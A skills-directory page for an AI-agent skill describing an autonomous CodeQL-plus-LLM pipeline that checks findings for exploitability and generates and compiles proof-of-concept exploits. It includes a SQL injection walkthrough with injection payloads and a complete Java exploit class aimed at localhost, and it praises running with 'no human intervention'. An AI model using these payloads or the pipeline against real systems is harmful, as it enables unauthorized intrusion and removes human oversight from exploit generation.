Skip to content
Back to skills

873 Phase2 Overview A828cf5e

ASecurity

This document explains the fully autonomous CodeQL analysis workflow implemented in Phase 2.

  • 9 stars
  • 0 votes
  • 0 copies
  • 0 views
  • Added October 11, 2026
ai-agentspythongojavac++bashsqltestingapidatabasesecurity

Works with

  • cli
  • api

Security analysis

A100/100

Scanned October 11, 2026

npx -y skills add tools-only/X-Skills --skill 873-phase2_overview_a828cf5e --agent claude-code

Installs into .claude/skills of the current project.

Are you the author of 873 Phase2 Overview A828cf5e?

Add the live security badge to your README. It updates with every re-scan.

Security grade badge for 873 Phase2 Overview A828cf5e
[![Security: A β€” Skills Directory](https://www.skillsdirectory.com/api/skills/tools-only-873-phase2-overview-a828cf5e/badge)](https://www.skillsdirectory.com/skills/tools-only-873-phase2-overview-a828cf5e)

More formats (shields.io, HTML) on the badges page. Keep it an A: scan every change in CI with Pro.

SKILL.md
# Phase 2: Autonomous Vulnerability Analysis - Overview

This document explains the fully autonomous CodeQL analysis workflow implemented in Phase 2.

## 🎯 What Phase 2 Does

Phase 2 takes the SARIF output from Phase 1 (CodeQL scanning) and performs **fully autonomous vulnerability analysis**:

1. **Dataflow Validation** - LLM validates if dataflow paths are truly exploitable
2. **Deep Vulnerability Analysis** - Multi-turn dialogue for thorough assessment
3. **PoC Exploit Generation** - Automatically creates working exploits
4. **Exploit Validation** - Compiles and validates generated exploits
5. **Iterative Refinement** - Auto-fixes compilation errors

## πŸ“Š Complete Workflow

```
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚                    PHASE 1: CodeQL Scanning                     β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ 1. Auto-detect languages                                        β”‚
β”‚ 2. Auto-detect build systems                                    β”‚
β”‚ 3. Create CodeQL databases (cached)                             β”‚
β”‚ 4. Run security suites                                          β”‚
β”‚ 5. Generate SARIF output                                        β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                       β”‚ SARIF files
                       β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚              PHASE 2: Autonomous Analysis                       β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚                                                                  β”‚
β”‚  For each finding in SARIF:                                     β”‚
β”‚                                                                  β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚ 1. Parse Finding                                           β”‚ β”‚
β”‚  β”‚    - Extract rule, location, code snippet                 β”‚ β”‚
β”‚  β”‚    - Identify CWE                                          β”‚ β”‚
β”‚  β”‚    - Check for dataflow paths                             β”‚ β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚                       β”‚                                          β”‚
β”‚                       β–Ό                                          β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚ 2. Read Vulnerable Code                                   β”‚ β”‚
β”‚  β”‚    - Load source file                                     β”‚ β”‚
β”‚  β”‚    - Extract context (50 lines before/after)             β”‚ β”‚
β”‚  β”‚    - Identify function/class context                     β”‚ β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚                       β”‚                                          β”‚
β”‚                       β–Ό                                          β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚ 3. Dataflow Validation (if applicable)                    β”‚ β”‚
β”‚  β”‚    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”‚ β”‚
β”‚  β”‚    β”‚ DataflowValidator                                β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Extract source, sink, intermediate steps       β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Identify sanitizers in path                    β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - LLM analyzes:                                  β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β€’ Can sanitizers be bypassed?                  β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β€’ Are there hidden barriers?                   β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β€’ Is path reachable at runtime?                β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β€’ What's the attack complexity?                β”‚   β”‚ β”‚
β”‚  β”‚    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β”‚ β”‚
β”‚  β”‚                                                            β”‚ β”‚
β”‚  β”‚    Result: DataflowValidation                             β”‚ β”‚
β”‚  β”‚    - is_exploitable: bool                                 β”‚ β”‚
β”‚  β”‚    - confidence: 0.0-1.0                                  β”‚ β”‚
β”‚  β”‚    - bypass_strategy: string                              β”‚ β”‚
β”‚  β”‚    - attack_complexity: low/medium/high                   β”‚ β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚                       β”‚                                          β”‚
β”‚         If not exploitable, STOP                                β”‚
β”‚                       β”‚                                          β”‚
β”‚                       β–Ό                                          β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚ 4. Deep Vulnerability Analysis                            β”‚ β”‚
β”‚  β”‚    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”‚ β”‚
β”‚  β”‚    β”‚ LLM Analysis (with optional multi-turn)          β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Is this a true positive?                       β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Is it exploitable?                             β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Exploitability score (0.0-1.0)                 β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Attack scenario (step-by-step)                 β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Prerequisites for exploitation                 β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Impact assessment                              β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - CVSS estimate                                  β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Mitigation recommendations                     β”‚   β”‚ β”‚
β”‚  β”‚    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β”‚ β”‚
β”‚  β”‚                                                            β”‚ β”‚
β”‚  β”‚    Result: VulnerabilityAnalysis                          β”‚ β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚                       β”‚                                          β”‚
β”‚         If not exploitable, STOP                                β”‚
β”‚                       β”‚                                          β”‚
β”‚                       β–Ό                                          β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚ 5. PoC Exploit Generation                                 β”‚ β”‚
β”‚  β”‚    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”‚ β”‚
β”‚  β”‚    β”‚ LLM Exploit Generator                            β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Uses Mark Dowd persona (expert)                β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Temperature: 0.8 (creative)                    β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Includes full context:                         β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β€’ Vulnerable code                              β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β€’ Analysis reasoning                           β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β€’ Attack scenario                              β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β€’ Prerequisites                                β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Generates working exploit code                 β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Language-appropriate (Java/Python/etc.)        β”‚   β”‚ β”‚
β”‚  β”‚    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β”‚ β”‚
β”‚  β”‚                                                            β”‚ β”‚
β”‚  β”‚    Output: Complete exploit source code                   β”‚ β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚                       β”‚                                          β”‚
β”‚                       β–Ό                                          β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚ 6. Exploit Validation & Refinement                        β”‚ β”‚
β”‚  β”‚    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”‚ β”‚
β”‚  β”‚    β”‚ ExploitValidator (from RAPTOR autonomous/)       β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Attempt compilation (gcc/javac/etc.)           β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - Extract compilation errors                     β”‚   β”‚ β”‚
β”‚  β”‚    β”‚ - If failed:                                     β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”        β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β”‚ Iterative Refinement (up to 3x)     β”‚        β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β”‚ - Pass errors back to LLM           β”‚        β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β”‚ - LLM fixes the code                β”‚        β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β”‚ - Retry compilation                 β”‚        β”‚   β”‚ β”‚
β”‚  β”‚    β”‚   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜        β”‚   β”‚ β”‚
β”‚  β”‚    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β”‚ β”‚
β”‚  β”‚                                                            β”‚ β”‚
β”‚  β”‚    Result: ValidationResult                               β”‚ β”‚
β”‚  β”‚    - success: bool                                        β”‚ β”‚
β”‚  β”‚    - exploit_path: Path (if compiled)                     β”‚ β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚                       β”‚                                          β”‚
β”‚                       β–Ό                                          β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚ 7. Save Artifacts                                         β”‚ β”‚
β”‚  β”‚    - analysis/{rule_id}_{line}_analysis.json             β”‚ β”‚
β”‚  β”‚    - exploits/{rule_id}_{line}_exploit.{java|py}         β”‚ β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚                                                                  β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                      β”‚
                      β–Ό
             Final Summary Report
```

## πŸ” Key Components

### 1. DataflowValidator (`dataflow_validator.py`)

**Purpose**: Validates CodeQL dataflow findings beyond static analysis.

**Capabilities**:
- Extracts source β†’ sink paths from SARIF
- Identifies intermediate steps and sanitizers
- LLM analyzes:
  - Sanitizer effectiveness
  - Bypass strategies
  - Hidden barriers
  - Runtime reachability
  - Attack complexity

**Example Prompt**:
```
You are analyzing a dataflow path:

SOURCE: User input from HTTP parameter
  LoginController.java:45

STEP 1: Passes through validation
  InputValidator.java:23

SINK: SQL query execution
  UserDAO.java:78

SANITIZERS: Basic input validation

Determine:
1. Can the sanitizer be bypassed?
2. Is this truly exploitable?
3. What's the attack complexity?
```

**Output**:
```json
{
  "is_exploitable": true,
  "confidence": 0.85,
  "sanitizers_effective": false,
  "bypass_possible": true,
  "bypass_strategy": "Use SQL comment syntax to bypass length check",
  "attack_complexity": "medium",
  "reasoning": "The input validator only checks length, not content...",
  "barriers": ["Length limit of 100 chars"],
  "prerequisites": ["Valid user account", "Access to login form"]
}
```

### 2. AutonomousCodeQLAnalyzer (`autonomous_analyzer.py`)

**Purpose**: Orchestrates complete autonomous analysis pipeline.

**Integrations**:
- **LLM Client** (`packages/llm_analysis/llm/client.py`) - Multi-provider LLM support
- **ExploitValidator** (`packages/autonomous/exploit_validator.py`) - Compilation validation
- **MultiTurnAnalyser** (`packages/autonomous/dialogue.py`) - Deep iterative analysis

**Analysis Pipeline**:

```python
def analyze_finding_autonomous(self, sarif_result, repo_path, out_dir):
    # 1. Parse finding from SARIF
    finding = self.parse_sarif_finding(sarif_result)

    # 2. Read vulnerable code with context
    code = self.read_vulnerable_code(finding, repo_path)

    # 3. Validate dataflow (if applicable)
    if finding.has_dataflow:
        dataflow = self.dataflow_validator.validate_finding(sarif_result)
        if not dataflow.is_exploitable:
            return  # Stop if dataflow blocked

    # 4. Deep LLM analysis
    analysis = self.analyze_vulnerability(finding, code, dataflow)
    if not analysis.is_exploitable:
        return  # Stop if not exploitable

    # 5. Generate PoC exploit
    exploit = self.generate_exploit(finding, analysis, code)

    # 6. Validate & refine exploit
    validation = self.validator.validate_exploit(exploit)
    while not validation.success and iterations < 3:
        exploit = self.refine_exploit(exploit, validation.errors)
        validation = self.validator.validate_exploit(exploit)

    # 7. Save artifacts
    save_analysis(finding, analysis, dataflow)
    save_exploit(exploit)
```

### 3. Complete Workflow (`raptor_codeql.py`)

**Purpose**: End-to-end autonomous security testing.

**Usage**:
```bash
# Fully autonomous (zero configuration)
python3 raptor_codeql.py --repo /path/to/code

# What happens:
# Phase 1: CodeQL scanning (5-30 min)
#   - Auto-detect Java
#   - Create database
#   - Run security suite
#   - Output: 23 findings in SARIF
#
# Phase 2: Autonomous analysis (10-60 min)
#   - Analyze 20 findings (max-findings default)
#   - 12 found exploitable
#   - 10 exploits generated
#   - 8 exploits compiled successfully
```

## πŸ’‘ Example: SQL Injection Finding

Let's walk through a real example:

### Input (from SARIF):
```json
{
  "ruleId": "java/sql-injection",
  "level": "error",
  "message": {
    "text": "Query built from user-controlled source"
  },
  "locations": [{
    "physicalLocation": {
      "artifactLocation": {"uri": "src/main/java/UserDAO.java"},
      "region": {"startLine": 78}
    }
  }],
  "codeFlows": [
    {
      "threadFlows": [{
        "locations": [
          {"location": {"message": {"text": "source: request parameter"}}},
          {"location": {"message": {"text": "step: String concatenation"}}},
          {"location": {"message": {"text": "sink: executeQuery"}}}
        ]
      }]
    }
  ]
}
```

### Phase 2 Processing:

**Step 1: Parse Finding**
```python
finding = CodeQLFinding(
    rule_id="java/sql-injection",
    rule_name="SQL Injection",
    cwe="CWE-89",
    file_path="src/main/java/UserDAO.java",
    start_line=78,
    has_dataflow=True
)
```

**Step 2: Read Code**
```java
// UserDAO.java around line 78
public User getUserByUsername(String username) {
    String query = "SELECT * FROM users WHERE username = '"
                   + username + "'";  // ← VULNERABLE LINE 78
    try {
        ResultSet rs = stmt.executeQuery(query);
        // ...
    }
}
```

**Step 3: Dataflow Validation**
```
LLM Prompt:
"Analyze this dataflow path from HTTP parameter to SQL query.
The input passes through basic validation but uses string concatenation..."

LLM Response:
{
  "is_exploitable": true,
  "confidence": 0.95,
  "bypass_possible": true,
  "bypass_strategy": "Input ' OR '1'='1 to bypass WHERE clause",
  "attack_complexity": "low"
}
```

**Step 4: Vulnerability Analysis**
```
LLM Prompt:
"Is this SQL injection truly exploitable?..."

LLM Response:
{
  "is_exploitable": true,
  "exploitability_score": 0.9,
  "attack_scenario": "1. Access /users?username=admin' OR '1'='1...",
  "cvss_estimate": 8.5,
  "mitigation": "Use PreparedStatement with parameterized queries"
}
```

**Step 5: Exploit Generation**
```
LLM Prompt (Mark Dowd persona):
"Create a working SQL injection exploit for this vulnerability..."

LLM Response:
```java
/**
 * SQL Injection PoC for UserDAO.getUserByUsername()
 *
 * WARNING: For authorized testing only!
 */
public class SqlInjectionExploit {
    public static void main(String[] args) throws Exception {
        String targetUrl = "http://localhost:8080/users";

        // Payload: bypass authentication
        String payload = "admin' OR '1'='1' --";

        URL url = new URL(targetUrl + "?username=" + URLEncoder.encode(payload));
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();

        int responseCode = conn.getResponseCode();
        System.out.println("Response code: " + responseCode);

        // Read response
        BufferedReader in = new BufferedReader(
            new InputStreamReader(conn.getInputStream()));
        String line;
        while ((line = in.readLine()) != null) {
            System.out.println(line);
        }
        in.close();

        System.out.println("\nβœ“ SQL Injection successful!");
        System.out.println("Payload: " + payload);
    }
}
```

**Step 6: Validation**
```bash
# ExploitValidator attempts compilation
$ javac SqlInjectionExploit.java
βœ“ Compilation successful

Result:
{
  "success": true,
  "exploit_path": "exploits/java-sql-injection_78_exploit.java"
}
```

### Final Output:

**Directory Structure**:
```
out/codeql_acme-access_20251114_123456/
β”œβ”€β”€ codeql_java.sarif                                    # Phase 1
β”œβ”€β”€ autonomous/
β”‚   β”œβ”€β”€ analysis/
β”‚   β”‚   └── java-sql-injection_78_analysis.json         # Phase 2
β”‚   └── exploits/
β”‚       └── java-sql-injection_78_exploit.java          # Phase 2 βœ“ Compiled
└── autonomous_summary.json
```

**Analysis JSON** (`java-sql-injection_78_analysis.json`):
```json
{
  "finding": {
    "rule_id": "java/sql-injection",
    "cwe": "CWE-89",
    "file_path": "src/main/java/UserDAO.java",
    "start_line": 78
  },
  "analysis": {
    "is_exploitable": true,
    "exploitability_score": 0.9,
    "severity_assessment": "Critical",
    "attack_scenario": "...",
    "cvss_estimate": 8.5,
    "mitigation": "Use PreparedStatement..."
  },
  "dataflow_validation": {
    "is_exploitable": true,
    "confidence": 0.95,
    "bypass_strategy": "Input ' OR '1'='1..."
  }
}
```

## 🎯 Integration with Existing RAPTOR

Phase 2 seamlessly integrates with RAPTOR's existing autonomous system:

- **LLM Client** (`packages/llm_analysis/llm/client.py`)
  - Multi-provider support (Claude, GPT-4, Ollama)
  - Automatic fallback
  - Cost tracking
  - Response caching

- **Exploit Validator** (`packages/autonomous/exploit_validator.py`)
  - Compilation validation
  - Error extraction
  - Iterative refinement

- **Multi-Turn Analyzer** (`packages/autonomous/dialogue.py`)
  - Deep iterative reasoning
  - Confidence scoring
  - Convergence detection

- **Existing Patterns**
  - VulnerabilityContext β†’ CodeQLFinding
  - Same LLM prompts philosophy
  - Same output structure

## πŸš€ Usage Examples

### Basic Usage:
```bash
# Fully autonomous - everything automatic
python3 raptor_codeql.py --repo /path/to/code

# Output:
# Phase 1: 23 findings
# Phase 2: 12 exploitable, 10 exploits, 8 compiled
```

### Scan Only (Phase 1 only):
```bash
# Just scanning, no LLM analysis
python3 raptor_codeql.py --repo /path/to/code --scan-only
```

### Custom Settings:
```bash
# Analyze up to 50 findings
export ANTHROPIC_API_KEY=sk-...
python3 raptor_codeql.py \
  --repo /path/to/code \
  --languages java \
  --max-findings 50
```

### Output Structure:
```
out/codeql_<repo>_<timestamp>/
β”œβ”€β”€ codeql_java.sarif                    # Phase 1: CodeQL results
β”œβ”€β”€ autonomous/                          # Phase 2: Autonomous analysis
β”‚   β”œβ”€β”€ analysis/                        # Detailed analysis per finding
β”‚   β”‚   β”œβ”€β”€ {rule}_{line}_analysis.json
β”‚   β”‚   └── ...
β”‚   └── exploits/                        # Generated exploits
β”‚       β”œβ”€β”€ {rule}_{line}_exploit.java
β”‚       └── ...
β”œβ”€β”€ codeql_report.json                   # Phase 1 summary
└── autonomous_summary.json              # Phase 2 summary
```

## πŸ“ˆ Performance

- **Phase 1 (Scanning)**: 5-30 minutes
  - Database creation (cached after first run)
  - Query execution

- **Phase 2 (Autonomous Analysis)**: 10-60 minutes
  - Depends on:
    - Number of findings
    - LLM provider speed
    - Exploit compilation time
  - Parallelizable (future enhancement)

**Typical Timeline**:
```
00:00 - Start
00:05 - Database created (or cached)
00:08 - Security suite complete (23 findings)
00:10 - Begin autonomous analysis
00:15 - Finding 1-5 analyzed
00:25 - Finding 6-10 analyzed
00:35 - Finding 11-15 analyzed
00:45 - Finding 16-20 analyzed
00:50 - Exploit validation complete
00:50 - Done!
```

## πŸŽ“ Key Advantages

1. **Zero Configuration** - Works out of the box
2. **Fully Autonomous** - No human intervention needed
3. **Deep Analysis** - Goes beyond static detection
4. **Validated Exploits** - Actually compiles PoCs
5. **Iterative Refinement** - Fixes its own errors
6. **Seamless Integration** - Uses existing RAPTOR components
7. **Comprehensive Output** - SARIF + Analysis + Exploits

## πŸ”§ Requirements

- **CodeQL** - Installed and in PATH (or use --codeql-cli)
- **LLM Provider** - One of:
  - Anthropic API key (Claude) - Recommended
  - OpenAI API key (GPT-4)
  - Ollama running locally (free!)
- **Compilers** (for exploit validation):
  - Java: `javac`
  - C/C++: `gcc`
  - Python: built-in

## πŸ“ Next Steps

Want to try it? Just run:

```bash
# Set your API key
export ANTHROPIC_API_KEY=sk-...

# Run fully autonomous workflow
python3 raptor_codeql.py --repo /path/to/your/java/project

# Wait 20-60 minutes
# Review exploits in out/codeql_*/autonomous/exploits/
```

Daniel, this is what Phase 2 looks like! Ready to test it on your Java project once the CodeQL analysis finishes? πŸš€

Attribution

Is this your skill, or is something wrong with this listing? Request removal or report an issue. Author removals are honored within 72 hours.

Comments

Loading comments…